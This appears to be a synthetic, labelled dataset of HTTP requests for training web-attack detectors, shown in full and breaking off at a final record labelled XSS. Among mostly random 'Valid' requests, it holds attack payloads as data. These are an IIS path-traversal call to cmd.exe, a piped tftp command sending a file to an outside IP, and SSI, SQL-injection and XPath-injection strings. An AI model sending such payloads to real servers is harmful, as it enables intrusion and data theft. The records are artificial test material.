Proxy-Authorization: Basic aGtzc09lRTpuN2g4cw==
Authorization: NTLM bmVscTJzZWF1c3Jpb2Ruc3R3dGhlV3pFb2FhaWV0aWh0aWFtZXJldGV0czY=
Range: 9-,85-,-366544
Referer: /staimch5/auertaLs.tar
TE: gzip
Trailer: Upgrade
User-Agent: elehuseTun
UA-CPU: 68000
UA-Disp: 9753,204,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 040x521
Via: d3n/3.4 91.182.174.245
Transfer-Encoding: compress
Upgrade: rhr/1.3, Smen/4.8, iZ2/9.9, 9env/2.8
Warning: 702 168.204.87.137 "ge1tTv" 
X-Forwarded-For: 86.182.5.47
X-Serial-Number: 2418413
----: ------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 21343
Start - Id: 17658
class: Valid
GET /esWernli9e/9t1toshni/trsdu/hl.eAHCvZudDttYB.N5/Garuotieiodtkt/rlEZE/ilm2VE879jB6.cfm?n3tfSRtov=shWTzkAti06P&olikexTp=thbdKsrd-tcg&edifiomdr=89 HTTP/1.0
Host: 6.56.252.235:80
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.6
Accept-Encoding: gzip, gzip;q=0.5
Accept-Language: aice-nuiMlosx, rin-ypial, rqe-rty2mts
Cache-Control: no-transform
Client-ip: 93.54.113.223
Cookie: nyeedxnrom1eYn= yaJodoilike;asp3u=ofcn1wceeeoyts;3FxTbPR=5;mdclindmjue=258;goabeyhpd=eIbx8t9hcM6e;sne=mTU9SW
Cookie2: $Version="1"
Date: Wed, 01 Jun 05 14:11:40 GMT
ETag: W/"YJhwr3KmHodY4T8"
Expect: 100-continue
From: orsph@74It.it
If-Modified-Since: Fri, 07 Dec 07 06:05:00 UTC
If-Unmodified-Since: Thu, 19 Nov 09 13:50:23 CET
If-Match: *
If-None-Match: "H-TO45ikwC8xoI1CXJ"
If-Range: Sat, 30 Apr 05 20:30:08 CET
Max-Forwards: 4647
MIME-Version: 3.4
Pragma: tEtT=dxeit
Proxy-Authorization: Digest nc=e65f7eEB
Authorization: eihw 0erb=eebdTn
Range: 7-,-84952
Referer: /Ea74r.wav
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/4.8 (compatible; rseifsl; SunOS sun4u; isoe; e4rSisaTi; eMbt3t)
UA-CPU: Sparc
UA-Disp: 4701,7597,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 813x197
Via: HTTP/6.0 www.eprreIcs.jpg
Transfer-Encoding: deflate
Upgrade: sroe/0.2, 5nn3e/7.9, hetla/5.6
Warning: 026 www.rdtne0in.gif "tdiaf7hosrEtNs" "Fri, 13 Aug 04 05:13:22 CET"
X-Forwarded-For: 9.161.93.196
X-Serial-Number: 6572400
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 17658
Start - Id: 5191
class: Valid
POST /1Vh4de4r.html? HTTP/1.0
Content-Length: 98
Content-Language: isqu,7a1uott
Content-Encoding: gzip
Content-Location: /ei0r5err/aeem3e/rumcueer.shtml
Content-MD5: b2lldXQyYmlvNWlZb1NCbw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 20 Feb 04 17:31:53 GMT
Last-Modified: Thu, 15 Feb 07 05:34:42 UTC
Host: www.psrs.gov:696
Connection: rn7nhhc4
Accept: */*;q=0.1
Accept-Charset: iso-8859-5;q=0.5
Accept-Encoding: gzip, deflate;q=0.0
Accept-Language: Rtz-aiuh
Cache-Control: no-transform
Client-ip: 81.147.169.139
Cookie: i6nullhrIKjr06g=b
Cookie2: $Version="250"
Date: Fri, 22 Apr 05 03:57:07 GMT
ETag: W/"rLV7rPzIFtVMdQmWNN0"
Expect: 100-continue
From: poNh5pmt@ler5Ht.st
If-Modified-Since: Tue, 13 Jun 06 18:06:02 CET
If-Unmodified-Since: Tue, 03 Feb 09 08:02:30 GMT
If-Match: "T2wjfv-kfEv@OQkV0c"
If-None-Match: *
If-Range: "rpEdEyFFCiBbEclGqg0N"
Max-Forwards: 005
MIME-Version: 7.8
Pragma: dMnWsoi='ttgorx'
Proxy-Authorization: Basic dHR5YUh0NzpmdG1uaQ==
Authorization: Digest realm
Range: -71
Referer: /S66pf/jnana/lMrrt.ace
TE: trailers
Trailer: Host
User-Agent: Mozilla/4.1 (Machintosh; U; PPC Mac OS X 4.7; de-it; rv:4.1.1) Gecko/77655865
UA-CPU: MIPS
UA-Disp: 5363,7210,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 4221x6356
Via: nYoxn/0.2 178.123.177.203, 5.8 234.87.86.216, 7.8 www.sLjbesI.shtml
Transfer-Encoding: compress
Upgrade: cpuy/9.4, tco/4.5, 15iM1/7.2
Warning: 373 www.4r2r5.png "w7aneaottrsesClYedt" "Thu, 08 Mar 07 03:16:27 CET"
X-Forwarded-For: 221.88.76.116
X-Serial-Number: 083639126
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

els=433107&easiaueg=&ur&nI0adhltS=n_y&1gerjc8is7k=ciHIeGq&lzgmrreu=Tdi&lerartloo=2&kprpT=daI7nX4

End - Id: 5191
Start - Id: 43705
class: OsCommanding
GET /scripts/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 26.96.217.146:80
Connection: oadteN
Accept: */*;q=0.5
Accept-Charset: iso-8859-15;q=0.6, iso-8859-7
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.5
Cache-Control: Rioyio1='h'
Client-ip: 131.122.223.243
Cookie: boU8iqylp4d=7516537927;gRtb9lai=05129;abtd=ofieencod;i51bisht1hShsa=1761834619
Cookie2: $Version="916"
Date: Mon, 21 Sep 09 06:43:48 UTC
ETag: "-4D7Jo4QjAO6o6dlRPcD"
Expect: 100-continue
From: nnlogc@ewfasl3.ch
If-Modified-Since: Sun, 15 Jul 07 19:27:52 CET
If-Unmodified-Since: Tue, 27 Apr 10 06:11:31 UTC
If-Match: *
If-None-Match: "2sJzH8YrLyPo3VoV"
If-Range: Sat, 22 Apr 06 10:57:09 UTC
Max-Forwards: 20
MIME-Version: 8.9
Pragma: id=opgier
Proxy-Authorization: Digest username="6Yfo3"
Authorization: Digest nc=D9942BcD
Range: 251-3,844750-,3500-
Referer: http://www.tJ4ii.de/cr0ttr/meaGgTn.asmx
TE: trailers,trailers,gzip;q=0.7
User-Agent: Mozilla/3.1 (Windows; U; Win98 8.6; a5-ji; rv:0.6.7) Gecko/80193525
UA-CPU: 68000
UA-Disp: 911,720,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5641x613
Via: FTP/3.9 50.200.48.127
Transfer-Encoding: onsdi; RteJ=0Swthec
Upgrade: HweTi/0.0, tten/3.8, hSbn/1.3, sniu/8.5, tfxay/0.5
Warning: 708 148.220.94.123 "t7popsifwheZr" 
X-Forwarded-For: 253.164.33.60
X-Serial-Number: 181822248668347
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43705
Start - Id: 18755
class: Valid
GET /ai.pl?wR=ade.yT_R&u1jcitetn=12 HTTP/1.1
Host: 209.36.182.116
Connection: gUes
Accept: */*
Accept-Charset: hz-gb-2312;q=0.3, x-mac-roman
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=3
Client-ip: 119.221.206.231
Cookie: njrsafaoDs=n;1at=9jeoeobwgE'v;auahpRtuiH5Itt=5579;nrtykRw6etf7x=f3bneeen;trrSyyidtsfiu=9
Cookie2: $Version="6"
Date: Sat, 13 Mar 10 13:22:23 GMT
ETag: W/"7gzlFUv03erW63B-VC4"
Expect: rtnpIya=nirrWdcs;hlOht=Hm0e
From: envreer4@lEts7.gov
If-Modified-Since: Wed, 23 Sep 09 07:56:32 UTC
If-Unmodified-Since: Wed, 21 Feb 07 13:25:19 GMT
If-Match: *
If-None-Match: "nOvsh2F4xcBPYEbLr@-X"
If-Range: Sun, 12 Apr 09 15:29:09 GMT
Max-Forwards: 9
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: esser hihGc=hbie3
Range: -062629
Referer: http://www.h1hino.net/1xbp90ih/dzo5on.shtml
TE: trailers,gzip;q=0.0
Trailer: Accept
User-Agent: n5ldcinto1umnieev9i
UA-CPU: x86
UA-Disp: 752,4892,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 854x2880
Via: FTP/9.3 www.Eodrua.jpeg, 9.2 www.hettet.htm
Transfer-Encoding: compress
Upgrade: bUtii/8.0, waiu/0.5, s1teu/3.7
Warning: 507 www.wreo7ba.css:5 "cr6imt7c" "Wed, 11 Feb 04 08:24:25 GMT"
X-Forwarded-For: 11.94.114.1
X-Serial-Number: 57174297786
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18755
Start - Id: 20123
class: Valid
GET /lCZZZcmdPnph-w/yU/s0K4IYV_KqDbqOs/CYUJ@UJGC/5HwBd3S4O_5adminIY/tnh/sA5f5n/eeiode1eyrt.htm?7sdfpwTyfd2tpc=sbe&rbEizrn2xtetsE=jescintaahs1nm8&6oawnlooetf=yhxkryicbmc2tqenus&2qnLael=4intna%25uichild%40&eoteST=8577821122&lianyd4jwthg=boot.iniaihrinmust%5B81linko&fertW82ne7s=onfegoiortmChreq&nqSasog82Taq=28885&hitnhR=toarcOmae9iL&ntdi3pfmuS=88373609&Hioco=026&to=fn%27av&llvaHi=peuruoetrza&4dnq=di0 HTTP/1.1
Host: 222.134.43.165
Connection: oorr7euo
Accept: */*;q=0.8
Accept-Charset: shift_jis, iso-8859-4, cp-950, utf-7;q=0.9
Accept-Encoding: compress, gzip, identity;q=0.1, deflate;q=0.8, deflate
Accept-Language: yteraax-n7t;q=0.5, 1r5e-tmom, h-tegns28f
Cache-Control: min-fresh=48233
Client-ip: 4.63.101.158
Cookie: ff=edsedeoE+lE;eo3ntdnuqdb=b<@ne Y;uSelt=bJ0LmIODHV;dmtic=3VjFZ
Cookie2: $Version="81"
Date: Fri, 29 Aug 08 01:27:38 UTC
ETag: W/"Tf8X3CXAf5I45DGs.4H."
Expect: 100-continue
From: np1ebr9@yntet.it
If-Modified-Since: Mon, 27 Sep 04 05:55:26 UTC
If-Unmodified-Since: Sat, 10 Jul 04 08:25:36 CET
If-Match: "iPwl0Zw7uw7w--5"
If-None-Match: "fkQ4.ZkuLCPNpmF2r_"
If-Range: Tue, 13 Mar 07 03:20:11 UTC
Max-Forwards: 842
MIME-Version: 9.3
Pragma: coti='weesh'
Proxy-Authorization: NTLM dEVldGlyYW5yeGlyYWV6dWVobnRUZG5uYTNOY2NhUm9yZXN0bA==
Authorization: aoMoA rbnU=YhsEEmt
Range: 48910-875971,804755-62
Referer: /y3maOrbc/oqptzvr.jsp
TE: trailers
Trailer: Host
User-Agent: Mozilla/2.0 (Windows; U; Win 9x 1.5; tw-om; rv:6.8.3) Gecko/37318574
UA-CPU: Sparc
UA-Disp: 972,951,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 2245x9664
Via: 6.6 www.Sehn1apS.tiff, FTP/6.3 www.tsato.js:29
Transfer-Encoding: compress
Upgrade: jtnwgT/9.0
Warning: 660 www.e06sbm.png:915 "itsTnmtqleDAXa" "Fri, 23 Dec 05 19:02:37 GMT"
X-Forwarded-For: 171.141.7.56
X-Serial-Number: 9909201039312
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20123
Start - Id: 39231
class: SSI
GET /oFlocationZ/98pxPK-rBy.xJz/eO9zk1SM7aSPg7HWY/dfqn8acyal6thuc/aSBf2TItXQL4K/SGTnetgntonkalEa4aO1/a9oeE0cow0sGe.mspx?ssnryA672=borle9an&rtaoWhhestk=%3C%21--%23email+fromhost%3D%22www.tncien.com%22+tohost%3D%22mailbox.a4adg.com%22+message%3D%22n0u3+6s5pbC+0URtno+ao6tr%22+fromaddress%3D%222hdhr.com%22+toaddress%3D%22iij.ecn.com%22+subject%3D%22f64%22+sender%3D%22pvph.com%22+replyto%3D%22pngqns.com%22+cc%3D%22jte5%22+inreplyto%3D%22i85t+teh+b6aet%22+id%3D%22oomail%22+--%3E HTTP/1.0
Host: 70.47.200.168
Connection: af0Md8ws
Accept: audio/x-wav;q=0.3, text/xml, audio/*;q=0.8
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: byfteji-O;q=0.0, 2suiieh-tiiPye, teljGnfg-nzVrcmr;q=0.0, h-1w, d6-hd;q=0.7
Cache-Control: only-if-cached
Client-ip: 115.187.210.122
Cookie: aspaqs7lOloevmo=qre7estat;aiJ11=3Q_O@fZ
Cookie2: $Version="798"
Date: Sun, 24 Jul 05 11:15:40 CET
ETag: "4WITdI0tQXVWOMUbkat"
Expect: 100-continue
From: lyrtrai@3atnetodh4.net
If-Modified-Since: Wed, 13 May 09 10:03:18 CET
If-Unmodified-Since: Sat, 04 Oct 08 18:51:21 CET
If-Match: *
If-None-Match: *
If-Range: "6-4buPdj1OH4uxYKc-"
Max-Forwards: 1
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic c2ltMjpzYWdlYjVhYQ==
Authorization: tnehsR oeivpo=oehots
Range: 5-9725,-6683
Referer: http://www.9ttnmgsu.de/1eks3/rutau/eitta5nc.pdf
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: tzctEp2dh
UA-CPU: 68000
UA-Disp: 274,6270,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 833x510
Via: HTTP/7.4 167.72.115.253
Transfer-Encoding: compress
Upgrade: sjrtoN/2.4, ytwq/5.4, RmLke/9.3, citRri/1.2
Warning: 173 103.13.38.123 "ncwbefh" "Tue, 25 Oct 05 02:27:19 UTC"
X-Forwarded-For: 252.9.253.184
----: ---------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 39231
Start - Id: 8474
class: Valid
GET /7tcM-4RKxav@M@/rVId..swf?rKNhT7winntT=o3gdTt%7Coqdizl3&no5dnuta=3ewl&yseLav8nat=hE+%25ent%3B8tc&R36d.jstdinb3=023 HTTP/1.0
Host: www.iehyApbfy.fr:80
Connection: close
Accept: audio/x-wav, image/gif;q=0.6
Accept-Charset: euc-kr;q=0.2, iso-8859-3
Accept-Encoding: *;q=0.0
Accept-Language: urge4-b;q=0.5, nwe-da;q=0.3, he4rriiq-al5n
Cache-Control: no-transform
Client-ip: 247.231.82.2
Cookie: EritmtogutloIn=ruah>39ixRapasswdn[e;ieUrfnahe=862001;rntea=vthSy eia
Cookie2: $Version="81"
Date: Fri, 18 Jun 04 23:40:12 CET
ETag: "x-0vskwvvt.CtBrpiL@m"
Expect: syitagg=sraLqec;SStdathm=OdoOE
From: imIs@osaeiaEd.de
If-Modified-Since: Tue, 29 May 07 16:53:41 UTC
If-Unmodified-Since: Fri, 04 Apr 08 13:12:54 CET
If-Match: "jL@PWaxxre90_4."
If-None-Match: "lZWOTtZJWnD4NFR"
If-Range: "qM@wNRVLXQrE2NV0YgjA"
Max-Forwards: 418
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic ZWRpdWVxaWE6Nmxvb2k=
Authorization: nReo i2eweg=sbPvnwr
Range: 27626-91
Referer: /aosIebe/eQjyic5/Ossaza/shnhoypr/eh2ots.asp
TE: gzip;q=0.2
Trailer: Via
User-Agent: Mozilla/5.5 (X11; U; Solaris 5.1; w1-cx; rv:8.3.5) Gecko/28446985
UA-CPU: 68000
UA-Disp: 8051,5811,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8509x9996
Via: 5.2 www.iaeS0UGk.tiff
Transfer-Encoding: compress
Upgrade: odk/7.0
Warning: 961 www.ntijm.html "estseteardr" "Thu, 20 Mar 08 23:35:03 CET"
X-Forwarded-For: 53.255.102.214
X-Serial-Number: 3858691762
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8474
Start - Id: 44574
class: OsCommanding
GET /vKjwcMtdVj/httpsHH/aLorefuo0trKfaoeiin/erhaOR2nADodHWs5N1/Alrsahhte/gd6p4-xOV/8aPP0i/ae9srsmA2asnmneoh.php?oena=34&imyc=134.33.40.60++%7Ctftp++++-i+++++199.180.212.119+PUT+sam._&brsniwnt=1toOn3ywhereachildtxp_%7EvbscriptD%3C&fM=4o&esuw55i=m&Eapunisepna=mlv&tfihrufenriheE=7760&wd=Etd&tno=iHe5ocrdTemjH+i&irSin=t+tntrssNee&ob=%7C&ot=7920396631&5onlidrg6upTmsr=26&f5dhtd=93337 HTTP/1.0
Host: 130.174.61.171
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: windows-1254;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 164.152.31.227
Cookie: oD=tu-;rHD4servicesGX2=tl3tT 1e;syey=toaocang
Date: Sun, 18 May 08 07:01:26 GMT
From: ne1pNm@taromiNse.be
If-Unmodified-Since: Thu, 23 Jun 05 23:31:57 GMT
If-None-Match: "2gPu@Tm5BokP1MhXJvjE"
If-Range: *
Max-Forwards: 2380
Pragma: no-cache
Proxy-Authorization: NTLM bnhhaXNPeWxoTjJPdW92aGVpRG5mb1Vhc3VzZTNDc0U=
Referer: http://veirmj.fr/cNtfesx/b6eay/ttadsf.gif
TE: trailers,trailers,chunked
User-Agent: Mozilla/8.2 (X11; U; Open BSD i586 7.0; sl-f7; rv:1.4.9) Gecko/71354260
Via: HTTP/2.5 31.37.238.229:80545
Transfer-Encoding: gzip
Upgrade: 93A/7.1, Vd8/3.3, stara7/6.4
X-Forwarded-For: 84.212.52.145
----: ---------------------------------------------

null

End - Id: 44574
Start - Id: 12102
class: Valid
GET /sX2K@K5/cb4yJbkSu/eifoat.mspx?Wboot.ini49Z.=oUOd&aopdwhtia1=i5Yr&neuhxyIt=%5Be3-inbinbs&sel9amuir=940126018&zzTClsiY=k3%3Csae&2-TBpV4hi=toikshRyeke HTTP/1.1
Host: 178.5.30.192:80
Connection: 9udsvhol
Accept: */*
Accept-Charset: cp-950;q=0.4, windows-1250;q=0.1, iso-2022-jp;q=0.0, x-mac-roman
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: max-stale
Client-ip: 161.155.47.193
Cookie: or5Uhlnewva=s_QgZBe;2a=rr;6e=aiaaceX;tt=s7;us9esl=r.5xp9s.yO
Cookie2: $Version="4"
Date: Thu, 11 Feb 10 21:44:44 GMT
ETag: "B_yWLx.fRRhYiw6gV"
Expect: Epfsht
From: nj6pNha@dohie.ch
If-Modified-Since: Sun, 17 Jan 10 01:32:12 GMT
If-Unmodified-Since: Tue, 26 Jan 10 16:23:34 CET
If-Match: "5BjaTbACbuYtTSR"
If-None-Match: *
If-Range: Wed, 03 Jan 07 24:20:10 CET
Max-Forwards: 591
MIME-Version: 2.8
Pragma: v3el=ila
Proxy-Authorization: tdsfn gn6Hi=ruDos9tw
Authorization: Digest cnonce="uotnne"
Range: 24940-,0292-
Referer: http://www.etrasL.gov/cutrosa.php3
TE: gzip
Trailer: Trailer
User-Agent: h6ilgtiesp/1.7
UA-CPU: Sparc
UA-Disp: 3494,5887,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6469x6483
Via: 6.1 www.air6rinj.png, nswr0l/7.3 97.130.74.123:579, 1.8 24.163.46.57
Transfer-Encoding: identity
Upgrade: Cdr/9.5, gton/2.2
Warning: 364 www.rnndhhu.html "lNiB7of9mccT8t4" 
X-Forwarded-For: 222.31.114.163
X-Serial-Number: 739755
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12102
Start - Id: 41683
class: SqlInjection
GET /nY4Kh9p8lL65dXb@he9/iGAfd4v.png?1ceryao=ohsock_streamsve5erpEewindow.opene&n1k=11&1ESdehi7AW=%27+++%29+++UNION++++ALL++SELECT++++%27cndsySaoek%27%2C264%2C33%2C%27feNtua%27%2C38++FROM+++eiermwuo+++WHERE+++%28+++%27%27+++%3D+++%27&ifionhw=in1s6&rpoh=t1D-vRE&azrmdprqpj=neittgq&iia0l=preese HTTP/1.0
Host: 125.136.206.163
Connection: keep-alive
Accept: application/*;q=0.4, image/jpeg
Accept-Charset: iso-2022-kr;q=0.9, iso-8859-6;q=0.5, x-mac-greek;q=0.3, utf-8;q=0.8, iso-8859-4
Accept-Encoding: *;q=0.1
Accept-Language: xnhb-ysanTbfr
Cache-Control: no-store
Client-ip: 106.39.43.168
Cookie: eihren=8639;0j0Ipyh=1522184;23bnp=t-W;8efertr=i7RckUmE.bD
Cookie2: $Version="6"
Date: Fri, 21 Aug 09 07:42:54 CET
ETag: "GYdRMLZJryVuagR3"
Expect: 100-continue
From: ube8gesO@rdptemmi.st
If-Modified-Since: Sun, 24 Aug 08 20:53:29 GMT
If-Unmodified-Since: Thu, 23 Mar 06 13:43:40 GMT
If-Match: "xoPSHlY2Od6._xoDTKi"
If-None-Match: "Xqu2mkatyNAiS.xIl"
If-Range: Tue, 19 Apr 05 24:02:52 GMT
Max-Forwards: 172
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: NTLM bGVkbGpuZW1ucXRsb2JnZWJiZWVmVW0ycGVzbWxpaTRWbVNHeQ==
Authorization: NTLM cnQyc3dhajluYW9ibHIwZWRkTW5tdWQ1ZGNoc3lpaGJld29h
Range: 87689-74,-52021,11-
Referer: /sUasn/qntzxo8e.gif
TE: chunked;q=0.6,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/1.7 (Machintosh; U; PPC 9.5; jl-5i; rv:7.8.8) Gecko/96436225
UA-CPU: PowerPC
UA-Disp: 1862,8220,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 232x3893
Via: 5.8 www.2eweqi.htm, 4zeNn/1.7 www.r4x8sO.gif, FTP/3.3 www.9A8k.shtml
Transfer-Encoding: deflate
Upgrade: dahek/1.1, htct/7.8, rrepda/5.7, eos/3.6, uoe/1.9
Warning: 118 2.156.64.121 "naglietszhgs" 
X-Forwarded-For: 39.208.247.75
X-Serial-Number: 611965021882313
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41683
Start - Id: 10720
class: Valid
GET /xNlocation3uaT7@0e.4T/1rnlbeay7a9G/e_@bx7IH@qbszSM70Yy/Cdwypassthrus39qdo8y-V.js?hb=tbnsS&meta6Yy=3mgDx7sl HTTP/1.0
Host: www.uta3phard.gov
Connection: iolbt
Accept: */*
Accept-Charset: euc-kr, euc-tw;q=0.1
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: r5muf2=1r
Client-ip: 172.162.155.198
Cookie: ieyybE8q=s9sIhftdaxH;ocr=151134655;inzeeiw=fatey5'psanese
Cookie2: $Version="2"
Date: Mon, 01 Aug 05 11:22:38 CET
ETag: "WUg9JirefD8v_q3MzuXi"
Expect: 100-continue
From: s0rd3uti@drb2i.uk
If-Modified-Since: Wed, 16 Apr 08 09:07:17 GMT
If-Unmodified-Since: Sun, 18 Jan 09 01:40:13 GMT
If-Match: *
If-None-Match: "mJQ6GV_Tc0tYyzi4D9"
If-Range: "oJPbZIMcyvOGl1AA"
Max-Forwards: 84
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM dHUwZWxubGV3dXZpaWFlbm1wYW5hbHRtcU9iMmJzbmVyYWlzN2hhYWFlU3A0ZXBo
Range: 02-95
Referer: /s2sd7/hbSa.php4
TE: deflate;q=0.8
Trailer: If-Range
User-Agent: Mozilla/6.6 (X11; U; SunOS sun4u 4.8; ho-nN; rv:5.7.7) Gecko/63596844
UA-CPU: x86
UA-Disp: 592,9913,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 060x417
Via: 1.8 174.191.140.42:05411, ter/1.0 156.248.221.200, 9.7 www.sltae.css
Transfer-Encoding: deflate
Upgrade: ETte/9.1, etn7/6.6, nash/0.2, ssIaTe/4.2
Warning: 426 117.201.51.141 "WtatHstet1tscTat" 
X-Forwarded-For: 119.229.255.152
X-Serial-Number: 9427086908646610
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10720
Start - Id: 49697
class: XPathInjection
GET /4g3StFOWdWyJQQ3x/tnn/QBMTd-3WC/bopassthruv%udM/iehm9k9nadc/ovcepyRIsoS/iltbctA7Saaf8r/MRCc7BV2B/radGfoFraxoYbLaEde/razknoDa/mopltw4I.jpeg?oImtaont5iqeO=719&akUiwhecao=+Ut&rirC9aslslnT=50974&srarttoaankmw=3&P-0qw=e%27ee&0sitfg=84719+++++or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or++1721%3D&bodyzIfKkhttpg=eqtfd+oe%26owdS%26vartwp-&XKsystemrNH7a@=t%3Cs&jyT=861073047&rtdgiGitttaSeCn=5749&pn0oyHdQ=80079&jZFXPJetc88g=wLsFsj1XS&etrbiatlt5ay=wot1&sio=c HTTP/1.0
Host: 95.203.54.19
Connection: close
Accept: image/png, video/*;q=0.8
Accept-Charset: *
Accept-Encoding: compress;q=0.8, gzip, gzip, identity;q=0.3
Accept-Language: ufsieWrr-lbSrF, omiOhgo-qcurrndi;q=0.1, 1iu-9roclmVy, s-rwttf, fils-e;q=0.9
Cache-Control: only-if-cached
Client-ip: 251.247.9.85
Cookie: ldeq0h=ysLA6bB3CnA;uw=sN2wA;q6ejseedtq10s=3594552493;oJniD4VuH=slhasIansmrRted1
Cookie2: $Version="03"
Date: Tue, 14 Jun 05 12:31:27 UTC
ETag: W/"s3klw_r.kke6tQh"
Expect: iazqtree
From: tmHtei@9Eaetn4.de
If-Modified-Since: Tue, 27 Apr 04 21:14:11 CET
If-Unmodified-Since: Sat, 02 Dec 06 17:19:34 CET
If-Match: "VRZNLayvyq-fElq-"
If-None-Match: *
If-Range: *
Max-Forwards: 01
MIME-Version: 8.1
Pragma: k1ehsu1=d
Proxy-Authorization: NTLM b2RuZWV0bGVubm5nb2huU3diYWZibW9uc3BlRHp2dG1jYXdiZWNsM0FlNXM=
Authorization: aizl celi3ol=Reesi
Range: -394122
Referer: http://arao.gov/eu3dnw/esith/erEhD/eTvqDjf/enAosq.js
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: n6vafaita
UA-CPU: StrongARM
UA-Disp: 2722,5111,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6094x1402
Via: HTTP/7.0 www.oe5nl.jpg, 9.6 www.Parxds.js, 5.6 207.194.62.105:89
Transfer-Encoding: compress
Upgrade: ierniu/6.4, ytteh/9.3, ahoito/8.8
Warning: 928 www.sea4hf7.png:6529 "guetn6bIulNebhuhnEd" "Fri, 08 Apr 05 24:10:56 UTC"
X-Forwarded-For: 76.177.20.101
X-Serial-Number: 961902739764518
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49697
Start - Id: 32407
class: Valid
GET /ixzCK5a/dsa6f3/dCUuNdeleteKQi84I9Y/zguacenSto3ktuo/6Cal/i_0RM-w8N7mOGD/NT/8NLtelnetHBmXtelnet6Lpo/aosrcd3enhmtdh1.shtml? HTTP/1.1
Host: www.ns3Nlysif.gov:80
Connection: keep-alive
Accept: image/png
Accept-Charset: *
Accept-Encoding: identity, gzip, compress;q=0.4, compress;q=0.3
Accept-Language: etssdlpx-eyk;q=0.1
Cache-Control: ewn=ag
Client-ip: 241.94.253.141
Cookie: nrnqLeEshot=trw/zlmailniclso ;aTfn=8;efoanDWgydmi=6
Cookie2: $Version="672"
Date: Thu, 03 Jun 04 08:52:22 CET
ETag: W/"93RUwlNG4KegyyA"
Expect: a3hyiE=cht3onyt;reoe9
From: itad@eosuny.org
If-Modified-Since: Fri, 14 May 04 02:31:17 UTC
If-Unmodified-Since: Sun, 28 May 06 18:37:45 UTC
If-Match: "hY-jHAijChF5pIialPT"
If-None-Match: *
If-Range: Mon, 23 Nov 09 14:10:26 CET
Max-Forwards: 7270
MIME-Version: 9.0
Pragma: P='ooutc'
Proxy-Authorization: NTLM cXI0cm92enJpdWFsNmtnMWN5Y3Nsd2l0NDduZWVlZXJuZm9l
Authorization: dpei 0zujRtHy=7emo16a
Range: 0684-
Referer: http://7i7t4so.de/m3eeb7c.php
TE: chunked,trailers,trailers
Trailer: TE
User-Agent: npimtLex
UA-CPU: x86
UA-Disp: 7145,6642,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 441x524
Via: rot/3.0 www.rhnuRw.htm, 6.2 www.hluyx.jpg
Transfer-Encoding: identity
Upgrade: wrt/4.4
Warning: 836 141.65.153.233:359 "iornrlaImBreqs" "Sun, 16 Mar 08 07:29:36 GMT"
X-Forwarded-For: 130.13.184.238
X-Serial-Number: 2700091210
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32407
Start - Id: 47874
class: XSS
